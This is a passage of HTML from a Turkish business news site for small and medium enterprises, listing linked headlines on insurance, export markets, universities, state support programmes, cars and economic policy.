<a href="http://www.kobi-efor.com.tr/osb-firma-tanitim/esasligrup-gida-yeni-yatirimlarla-uretim-kapasitesini-artiracak-h7851.html" title="ESASLIGRUP GIDA, yeni yatırımlarla üretim kapasitesini artıracak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/esasligrup_gida_yeni_yatirimlarla_uretim_kapasitesini_artiracak_h7851_edc58.jpg" alt="ESASLIGRUP GIDA, yeni yatırımlarla üretim kapasitesini artıracak" />
<b>ESASLIGRUP GIDA, yeni yatırımlarla üretim kapasitesini artıracak</b></a>
</div>
</div></div><div class="katelement kat_k3">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/sigorta/fibaemeklilikten-egitime-arti-destek-h8000.html" title="Fibaemeklilikten eğitime artı” destek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/fibaemeklilikten_egitime_arti_destek_h8000_6063b.jpg" alt="Fibaemeklilikten eğitime artı” destek" />
<b>Fibaemeklilik’ten eğitime “artı” destek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sigorta/vakif-emeklilike-1-altin-3-bronz-odul-h7999.html" title="Vakıf Emeklilike 1 altın, 3 bronz ödül"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/vakif_emeklilike_1_altin_3_bronz_odul_h7999_db4f6.jpg" alt="Vakıf Emeklilike 1 altın, 3 bronz ödül" />
<b>Vakıf Emeklilik’e 1 altın, 3 bronz ödül</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sigorta/anadolu-hayat-emeklilikten-cocugum-icin-egitim-sigortasi-h7998.html" title="Anadolu Hayat Emeklilikten Çocuğum için Eğitim Sigortası"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/anadolu_hayat_emeklilikten_cocugum_icin_egitim_sigortasi_h7998_e592e.jpg" alt="Anadolu Hayat Emeklilikten Çocuğum için Eğitim Sigortası" />
<b>Anadolu Hayat Emeklilik’ten Çocuğum için Eğitim Sigortası</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/makina/makine-sektoru-bu-yil-18-milyar-dolar-ihracat-hedefliyor-h7886.html" title="Makine sektörü bu yıl 18 milyar dolar ihracat hedefliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/makine_sektoru_bu_yil_18_milyar_dolar_ihracat_hedefliyor_h7886_8ce40.jpg" alt="Makine sektörü bu yıl 18 milyar dolar ihracat hedefliyor" />
<b>Makine sektörü bu yıl 18 milyar dolar ihracat hedefliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sigorta/vakif-emeklilikten-otomatik-beste-yenilikci-hizmetler-h7921.html" title="Vakıf Emeklilikten Otomatik BESte yenilikçi hizmetler"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/vakif_emeklilikten_otomatik_beste_yenilikci_hizmetler_h7921_c1464.jpg" alt="Vakıf Emeklilikten Otomatik BESte yenilikçi hizmetler" />
<b>Vakıf Emeklilik’ten Otomatik BES’te yenilikçi hizmetler</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sigorta/anadolu-hayat-emeklilik-istikrarli-buyumesini-surduruyor-h7920.html" title="Anadolu Hayat Emeklilik, istikrarlı büyümesini sürdürüyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/anadolu_hayat_emeklilik_istikrarli_buyumesini_surduruyor_h7920_55f08.jpg" alt="Anadolu Hayat Emeklilik, istikrarlı büyümesini sürdürüyor" />
<b>Anadolu Hayat Emeklilik, istikrarlı büyümesini sürdürüyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/sigorta/nn-hayat-ve-emeklilikten-beste-hedefmatik-h7919.html" title="NN Hayat ve Emeklilikten, BESte ‘Hedefmatik"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/nn_hayat_ve_emeklilikten_beste_hedefmatik_h7919_b430d.jpg" alt="NN Hayat ve Emeklilikten, BESte ‘Hedefmatik" />
<b>NN Hayat ve Emeklilik’ten, BES’te ‘Hedefmatik’</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/finans/yatirimci-kobiye-hizir-gibi-finansal-kiralama-h7796.html" title="Yatırımcı KOBİye Hızır gibi: FİNANSAL KİRALAMA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yatirimci_kobiye_hizir_gibi_finansal_kiralama_h7796_1de99.jpg" alt="Yatırımcı KOBİye Hızır gibi: FİNANSAL KİRALAMA" />
<b>Yatırımcı KOBİ’ye Hızır gibi: FİNANSAL KİRALAMA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sigorta/anadolu-sigorta-ticari-isletme-ve-kobileri-de-siber-risklerden-koruyor-h7832.html" title="Anadolu Sigorta ticari işletme ve KOBİleri de siber risklerden koruyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/anadolu_sigorta_ticari_isletme_ve_kobileri_de_siber_risklerden_koruyor_h7832_cab50.jpg" alt="Anadolu Sigorta ticari işletme ve KOBİleri de siber risklerden koruyor" />
<b>Anadolu Sigorta ticari işletme ve KOBİ’leri de siber risklerden koruyor</b></a>
</div>
</div></div><div class="katelement kat_k5">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/ticarette-bakir-hedeflerimizden-kirgizistan-h7994.html" title="Ticarette bakir hedeflerimizden KIRGIZİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ticarette_bakir_hedeflerimizden_kirgizistan_h7994_eb5db.jpg" alt="Ticarette bakir hedeflerimizden KIRGIZİSTAN" />
<b>Ticarette bakir hedeflerimizden KIRGIZİSTAN</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-yeni-donem-hedeflerinden-afrikada-kenya-h7890.html" title="Türkiyenin yeni dönem hedeflerinden Afrikada KENYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_yeni_donem_hedeflerinden_afrikada_kenya_h7890_49a28.jpg" alt="Türkiyenin yeni dönem hedeflerinden Afrikada KENYA" />
<b>Türkiye’nin yeni dönem hedeflerinden Afrika’da KENYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/dunyanin-en-zengin-petrol-ve-altin-rezervlerine-sahip-ulkesi-venezuela-h7757.html" title="Dünyanın en zengin petrol ve altın rezervlerine sahip ülkesi; VENEZUELA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dunyanin_en_zengin_petrol_ve_altin_rezervlerine_sahip_ulkesi_venezuela_h7757_6281d.jpg" alt="Dünyanın en zengin petrol ve altın rezervlerine sahip ülkesi; VENEZUELA" />
<b>Dünyanın en zengin petrol ve altın rezervlerine sahip ülkesi; VENEZUELA</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/abnin-5-buyuk-ekonomisi-ispanya-h7668.html" title="ABnin 5. büyük ekonomisi İSPANYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/abnin_5_buyuk_ekonomisi_ispanya_h7668_6b4a1.jpg" alt="ABnin 5. büyük ekonomisi İSPANYA" />
<b>AB’nin 5. büyük ekonomisi İSPANYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyeye-dogudan-goz-kirpan-pazar-ticarette-denge-guney-kore-h7545.html" title="Türkiyeye Doğudan göz kırpan pazar TİCARETTE DENGE” GÜNEY KORE"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyeye_dogudan_goz_kirpan_pazar_ticarette_denge_guney_kore_h7545_73cb3.jpg" alt="Türkiyeye Doğudan göz kırpan pazar TİCARETTE DENGE” GÜNEY KORE" />
<b>Türkiye’ye Doğu’dan göz kırpan pazar TİCARETTE “DENGE” GÜNEY KORE</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/yanibasimizda-birlesiyorlar-romanyamoldova-h7470.html" title="Yanıbaşımızda birleşiyorlar ROMANYA+MOLDOVA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yanibasimizda_birlesiyorlar_romanyamoldova_h7470_43263.jpg" alt="Yanıbaşımızda birleşiyorlar ROMANYA+MOLDOVA" />
<b>Yanıbaşımızda birleşiyorlar ROMANYA+MOLDOVA</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/cezayir-moritanya-senegal-ve-mali-h7388.html" title="Cezayir, Moritanya, Senegal ve Mali"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cezayir_moritanya_senegal_ve_mali_h7388_8f0fb.jpg" alt="Cezayir, Moritanya, Senegal ve Mali" />
<b>Cezayir, Moritanya, Senegal ve Mali’</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/ekonomik-dogumuzun-yukselenleri-brezilya-ve-sili-h7236.html" title="‘Ekonomik Doğumuzun yükselenleri BREZİLYA ve ŞİLİ"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomik_dogumuzun_yukselenleri_brezilya_ve_sili_h7236_5ad00.jpg" alt="‘Ekonomik Doğumuzun yükselenleri BREZİLYA ve ŞİLİ" />
<b>‘Ekonomik Doğu’muzun yükselenleri BREZİLYA ve ŞİLİ</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/tuketim-ve-ticaret-kulturunde-bizden-bulgaristan-h7168.html" title="Tüketim ve ticaret kültüründe biz”den; BULGARİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tuketim_ve_ticaret_kulturunde_bizden_bulgaristan_h7168_c182b.jpg" alt="Tüketim ve ticaret kültüründe biz”den; BULGARİSTAN" />
<b>Tüketim ve ticaret kültüründe “biz”den; BULGARİSTAN</b></a>
</div>
</div></div><div class="katelement kat_k44">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/universite/toplumu-oncelikliyor-mezununun-niteligini-yukseltiyor-h7990.html" title="Toplumu öncelikliyor, mezununun niteliğini yükseltiyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/toplumu_oncelikliyor_mezununun_niteligini_yukseltiyor_h7990_9958b.jpg" alt="Toplumu öncelikliyor, mezununun niteliğini yükseltiyor" />
<b>Toplumu öncelikliyor, mezununun niteliğini yükseltiyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/isik-universitesi-surekli-egitim-merkezinden-iki-yeni-program-h8022.html" title="Işık Üniversitesi Sürekli Eğitim Merkezinden iki yeni program"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/isik_universitesi_surekli_egitim_merkezinden_iki_yeni_program_h8022_859d7.jpg" alt="Işık Üniversitesi Sürekli Eğitim Merkezinden iki yeni program" />
<b>Işık Üniversitesi Sürekli Eğitim Merkezi’nden iki yeni program</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/tab-gida-gelecegin-yoneticilerini-yetistiriyor-h8024.html" title="TAB Gıda geleceğin yöneticilerini yetiştiriyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tab_gida_gelecegin_yoneticilerini_yetistiriyor_h8024_840fc.jpg" alt="TAB Gıda geleceğin yöneticilerini yetiştiriyor" />
<b>TAB Gıda geleceğin yöneticilerini yetiştiriyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/qnb-finansbank-ile-koc-universitesinden-isbirligi-h8021.html" title="QNB Finansbank ile Koç Üniversitesinden işbirliği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/qnb_finansbank_ile_koc_universitesinden_isbirligi_h8021_30d1a.jpg" alt="QNB Finansbank ile Koç Üniversitesinden işbirliği" />
<b>QNB Finansbank ile Koç Üniversitesi’nden işbirliği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/turkiye-acik-bilim-zirvesi-sabanci-universitesinde-h8023.html" title="Türkiye Açık Bilim Zirvesi” Sabancı Üniversitesinde"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_acik_bilim_zirvesi_sabanci_universitesinde_h8023_ccaeb.jpg" alt="Türkiye Açık Bilim Zirvesi” Sabancı Üniversitesinde" />
<b>“Türkiye Açık Bilim Zirvesi” Sabancı Üniversitesi’nde</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/universite/istinyelilik-farkiyla-mezun-ediyor-hem-meslek-hem-hobi-kazandiriyor-h7885.html" title="İstinyelilik” farkıyla mezun ediyor, hem meslek hem hobi kazandırıyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/istinyelilik_farkiyla_mezun_ediyor_hem_meslek_hem_hobi_kazandiriyor_h7885_7b188.jpg" alt="İstinyelilik” farkıyla mezun ediyor, hem meslek hem hobi kazandırıyor" />
<b>“İstinyelilik” farkıyla mezun ediyor, hem meslek hem hobi kazandırıyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/pepsico-kizlarimiz-okuyor-projesiyle-kiz-ogrencilere-destek-oluyor-h7957.html" title="PepsiCo, Kızlarımız Okuyor” projesiyle kız öğrencilere destek oluyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/pepsico_kizlarimiz_okuyor_projesiyle_kiz_ogrencilere_destek_oluyor_h7957_eb500.jpg" alt="PepsiCo, Kızlarımız Okuyor” projesiyle kız öğrencilere destek oluyor" />
<b>PepsiCo, “Kızlarımız Okuyor” projesiyle kız öğrencilere destek oluyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/isik-universitesinde-egitim-teknolojileri-merkezi-kuruluyor-h7958.html" title="Işık Üniversitesinde ‘Eğitim Teknolojileri Merkezi kuruluyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/isik_universitesinde_egitim_teknolojileri_merkezi_kuruluyor_h7958_35896.jpg" alt="Işık Üniversitesinde ‘Eğitim Teknolojileri Merkezi kuruluyor" />
<b>Işık Üniversitesi’nde ‘Eğitim Teknolojileri Merkezi’ kuruluyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/kordsa-ytu-racing-ekibine-destek-verdi-h7956.html" title="Kordsa, YTÜ Racing ekibine destek verdi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kordsa_ytu_racing_ekibine_destek_verdi_h7956_9b852.jpg" alt="Kordsa, YTÜ Racing ekibine destek verdi" />
<b>Kordsa, YTÜ Racing ekibine destek verdi</b></a>
</div>
</div></div><div class="katelement kat_k45">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-tesvik-programlari-h7987.html" title="Destek-Teşvik Programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_tesvik_programlari_h7987_ec9a3.jpg" alt="Destek-Teşvik Programları" />
<b>Destek-Teşvik Programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-tesvik-programlari-h7891.html" title="Destek-Teşvik Programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_tesvik_programlari_h7891_3758f.jpg" alt="Destek-Teşvik Programları" />
<b>Destek-Teşvik Programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/kalkinma-ajanslari-2018-yili-fizibilite-destekleri-h7758.html" title="Kalkınma Ajansları 2018 Yılı Fizibilite Destekleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kalkinma_ajanslari_fizibilite_destekleri_2018_yili_h7758_158f7.jpg" alt="Kalkınma Ajansları 2018 Yılı Fizibilite Destekleri" />
<b>Kalkınma Ajansları 2018 Yılı Fizibilite Destekleri</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/kosgeb-kobi-teknoyatirim-kobi-teknolojik-urun-yatirim-destek-programi-h7673.html" title="KOSGEB-KOBİ TEKNOYATIRIM-KOBİ TEKNOLOJİK ÜRÜN YATIRIM DESTEK PROGRAMI"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kosgeb_kobi_teknoyatirim_kobi_teknolojik_urun_yatirim_destek_programi_h7673_a2166.jpg" alt="KOSGEB-KOBİ TEKNOYATIRIM-KOBİ TEKNOLOJİK ÜRÜN YATIRIM DESTEK PROGRAMI" />
<b>KOSGEB-KOBİ TEKNOYATIRIM-KOBİ TEKNOLOJİK ÜRÜN YATIRIM DESTEK PROGRAMI</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-tesvik-h7565.html" title="Destek-Teşvik"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_tesvik_h7565_04e82.jpg" alt="Destek-Teşvik" />
<b>Destek-Teşvik</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/tubitak-yenilikci-fiber-teknolojilerin-gelistirilmesi-h7469.html" title="TÜBİTAK Yenilikçi Fiber Teknolojilerin Geliştirilmesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tubitak_yenilikci_fiber_teknolojilerin_gelistirilmesi_h7469_713ae.jpg" alt="TÜBİTAK Yenilikçi Fiber Teknolojilerin Geliştirilmesi" />
<b>TÜBİTAK Yenilikçi Fiber Teknolojilerin Geliştirilmesi</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/proje-hibe-destekleri-h7356.html" title="PROJE HİBE DESTEKLERİ"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/proje_hibe_destekleri_h7356_4ef78.jpg" alt="PROJE HİBE DESTEKLERİ" />
<b>PROJE HİBE DESTEKLERİ</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/kosgebden-yerli-ve-milli-uretime-10-milyon-destek-h7287.html" title="KOSGEBden: YERLİ VE MİLLİ ÜRETİME 10 MİLYON DESTEK"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kosgebden_yerli_ve_milli_uretime_10_milyon_destek_h7287_57c4b.jpg" alt="KOSGEBden: YERLİ VE MİLLİ ÜRETİME 10 MİLYON DESTEK" />
<b>KOSGEB’den: YERLİ VE MİLLİ ÜRETİME 10 MİLYON DESTEK</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/dogu-marmara-kalkinma-ajansi-marka-2018-yili-mali-destek-programlarini-acikladi-h7161.html" title="Doğu Marmara Kalkınma Ajansı (MARKA) 2018 Yılı Mali Destek Programlarını açıkladı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dogu_marmara_kalkinma_ajansi_marka_2018_yili_mali_destek_programlarini_acikladi_h7161_0e570.jpg" alt="Doğu Marmara Kalkınma Ajansı (MARKA) 2018 Yılı Mali Destek Programlarını açıkladı" />
<b>Doğu Marmara Kalkınma Ajansı (MARKA) 2018 Yılı Mali Destek Programları’nı açıkladı</b></a>
</div>
</div></div><div class="katelement kat_k47">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/saglik/odeme-karsi-8-etkin-oneri-h7996.html" title="Ödeme karşı 8 etkin öneri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/odeme_karsi_8_etkin_oneri_h7996_5b7b6.jpg" alt="Ödeme karşı 8 etkin öneri" />
<b>Ödeme karşı 8 etkin öneri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/yerli-ilac-sanayicisine-dunyada-ilk-kez-hijyen-sertifikasi-h7995.html" title="Yerli ilaç sanayicisine dünyada ilk kez hijyen sertifikası"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yerli_ilac_sanayicisine_dunyada_ilk_kez_hijyen_sertifikasi_h7995_2dc1e.jpg" alt="Yerli ilaç sanayicisine dünyada ilk kez hijyen sertifikası" />
<b>Yerli ilaç sanayicisine dünyada ilk kez hijyen sertifikası</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/bayer-turkiyedeki-girisimcileri-girisimci-haritasina-davet-ediyor-h7997.html" title="Bayer Türkiyedeki girişimcileri Girişimci Haritası”na davet ediyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bayer_turkiyedeki_girisimcileri_girisimci_haritasina_davet_ediyor_h7997_8772b.jpg" alt="Bayer Türkiyedeki girişimcileri Girişimci Haritası”na davet ediyor" />
<b>Bayer Türkiye’deki girişimcileri “Girişimci Haritası”na davet ediyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/oto-yasam/aston-martinin-ilk-elektrikli-modeli-rapide-e-h8028.html" title="Aston Martinin ilk elektrikli modeli; ‘Rapide E"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/aston_martinin_ilk_elektrikli_modeli_rapide_e_h8028_13cad.jpg" alt="Aston Martinin ilk elektrikli modeli; ‘Rapide E" />
<b>Aston Martin’in ilk elektrikli modeli; ‘Rapide E’</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/oto-yasam/en-guclu-amarok-satisa-sunuldu-h8026.html" title="En güçlü Amarok satışa sunuldu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/en_guclu_amarok_satisa_sunuldu_h8026_b2ce9.jpg" alt="En güçlü Amarok satışa sunuldu" />
<b>En güçlü Amarok satışa sunuldu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/oto-yasam/alfa-romeo-giuliettada-otomatik-vites-hediye-h8027.html" title="Alfa Romeo Giuliettada otomatik vites hediye!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/alfa_romeo_giuliettada_otomatik_vites_hediye_h8027_37356.jpg" alt="Alfa Romeo Giuliettada otomatik vites hediye!" />
<b>Alfa Romeo Giulietta’da otomatik vites hediye!</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/oto-yasam/720-hplik-ferrari-488-pista-spider-tanitildi-h8025.html" title="720 HPlik Ferrari 488 Pista Spider tanıtıldı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/720_hplik_ferrari_488_pista_spider_tanitildi_h8025_550e4.jpg" alt="720 HPlik Ferrari 488 Pista Spider tanıtıldı" />
<b>720 HP’lik Ferrari 488 Pista Spider tanıtıldı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/ewe-enerji-calisanlari-maltepe-huzurevi-sakinleriyle-bulustu-h8031.html" title="EWE Enerji çalışanları Maltepe Huzurevi sakinleriyle buluştu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ewe_enerji_calisanlari_maltepe_huzurevi_sakinleriyle_bulustu_h8031_62f62.jpg" alt="EWE Enerji çalışanları Maltepe Huzurevi sakinleriyle buluştu" />
<b>EWE Enerji çalışanları Maltepe Huzurevi sakinleriyle buluştu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/mitsubishi-electric-gorme-engelliler-icin-dokunma-tabanli-arayuz-gelistirdi-h8030.html" title="Mitsubishi Electric, görme engelliler için dokunma tabanlı arayüz geliştirdi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mitsubishi_electric_gorme_engelliler_icin_dokunma_tabanli_arayuz_gelistirdi_h8030_d91fd.jpg" alt="Mitsubishi Electric, görme engelliler için dokunma tabanlı arayüz geliştirdi" />
<b>Mitsubishi Electric, görme engelliler için dokunma tabanlı arayüz geliştirdi</b></a>
</div>
</div></div><div class="katelement kat_k46">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/osbuk-ic-anadolu-bolge-toplantisi-kayseride-gerceklestirildi-h7991.html" title="OSBÜK İç Anadolu Bölge Toplantısı, Kayseride gerçekleştirildi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/osbuk_ic_anadolu_bolge_toplantisi_kayseride_gerceklestirildi_h7991_75b6a.jpg" alt="OSBÜK İç Anadolu Bölge Toplantısı, Kayseride gerçekleştirildi" />
<b>OSBÜK İç Anadolu Bölge Toplantısı, Kayseri’de gerçekleştirildi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/dosya/yerli-ve-milli-uretimin-merkez-usleri-teknoparklar-h8064.html" title="‘Yerli ve milli üretimin merkez üsleri: Teknoparklar"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yerli_ve_milli_uretimin_merkez_usleri_teknoparklar_h8064_eb0c6.jpg" alt="‘Yerli ve milli üretimin merkez üsleri: Teknoparklar" />
<b>‘Yerli ve milli’ üretimin merkez üsleri: Teknoparklar</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/gelecegin-liderleri-gebzede-yetisiyor-h8045.html" title="Geleceğin Liderleri Gebzede Yetişiyor!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gelecegin_liderleri_gebzede_yetisiyor_h8045_a5dec.jpg" alt="Geleceğin Liderleri Gebzede Yetişiyor!" />
<b>Geleceğin Liderleri Gebze’de Yetişiyor!</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/yanindayiz-hareketi-basladi-h8047.html" title="‘YANINDAYIZ hareketi başladı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yanindayiz_hareketi_basladi_h8047_51017.jpg" alt="‘YANINDAYIZ hareketi başladı" />
<b>‘YANINDAYIZ’ hareketi başladı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/taider-aile-isletmelerinin-surdurulebilirligine-odaklaniyor-h7992.html" title="TAİDER aile işletmelerinin sürdürülebilirliğine odaklanıyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/taider_aile_isletmelerinin_surdurulebilirligine_odaklaniyor_h7992_b6a30.jpg" alt="TAİDER aile işletmelerinin sürdürülebilirliğine odaklanıyor" />
<b>TAİDER aile işletmelerinin sürdürülebilirliğine odaklanıyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/manhattanda-bir-anadolu-kadinin-hikayesi-esin-kirmizidag-h7993.html" title="Manhattanda bir Anadolu kadının hikayesi Esin Kırmızıdağ"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/manhattanda_bir_anadolu_kadinin_hikayesi_esin_kirmizidag_h7993_8cdac.jpg" alt="Manhattanda bir Anadolu kadının hikayesi Esin Kırmızıdağ" />
<b>Manhattan’da bir Anadolu kadının hikayesi Esin Kırmızıdağ</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/dosya/turkiye-ve-guney-kore-muteahhitleri-guclerini-birlestiriyor-h7988.html" title="Türkiye ve Güney Kore müteahhitleri güçlerini birleştiriyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_ve_guney_kore_muteahhitleri_guclerini_birlestiriyor_h7988_1e809.jpg" alt="Türkiye ve Güney Kore müteahhitleri güçlerini birleştiriyor" />
<b>Türkiye ve Güney Kore müteahhitleri güçlerini birleştiriyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/makedonya-avrupa-ve-atlantik-kurumlarinin-kapisini-aralayabilecek-mi-h8046.html" title="Makedonya, Avrupa ve Atlantik kurumlarının kapısını aralayabilecek mi?"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/makedonya_avrupa_ve_atlantik_kurumlarinin_kapisini_aralayabilecek_mi_h8046_2af23.jpg" alt="Makedonya, Avrupa ve Atlantik kurumlarının kapısını aralayabilecek mi?" />
<b>Makedonya, Avrupa ve Atlantik kurumlarının kapısını aralayabilecek mi?</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/one-cikan-sektorler-ve-urunler-acisindan-yerlilestirme-ve-millilestirme-h8007.html" title="Öne çıkan sektörler ve ürünler açısından ‘Yerlileştirme ve Millileştirme"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/one_cikan_sektorler_ve_urunler_acisindan_yerlilestirme_ve_millilestirme_h8007_d59df.jpg" alt="Öne çıkan sektörler ve ürünler açısından ‘Yerlileştirme ve Millileştirme" />
<b>Öne çıkan sektörler ve ürünler açısından ‘Yerlileştirme ve Millileştirme’</b></a>
</div>
</div></div> 
          </div>
                      </div>
        </div>
<!-- MENU ***************************************************** -->
              <!-- UST MANSET -->
        <div id="ustmanset" class="span12">
          <div class="row-fluid">
          <ul class="thumbnails">
				
			<li class="span3"><a href="http://www.kobi-efor.com.tr/kapak/gunes-bulut-arkasindan-gozuktu-yeni-ekonomi-programi-h8043.html" title="Güneş bulut arkasından gözüktü; YENİ EKONOMİ PROGRAMI" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/berat_albayrak-ustmanset.jpg" alt="Güneş bulut arkasından gözüktü; YENİ EKONOMİ PROGRAMI"  />
			<div class="caption-line"><p>Güneş bulut arkasından gözüktü; YENİ...</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/kapak/turkiye-sikintili-bir-gecitte-cikis-yolu-yerli-ve-milli-uretime-destek-ve-tesvikler-h8008.html" title="Türkiye sıkıntılı bir geçitte, çıkış yolu; ‘YERLİ ve MİLLİ’ ÜRETİME DESTEK VE TEŞVİKLER" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/kapakgorsel_ustmanset.jpg" alt="Türkiye sıkıntılı bir geçitte, çıkış yolu; ‘YERLİ ve MİLLİ’ ÜRETİME DESTEK VE TEŞVİKLER"  />
			<div class="caption-line"><p>‘YERLİ ve MİLLİ’ ÜRETİME DESTEK...</p></div>						</a>
			</li>


		
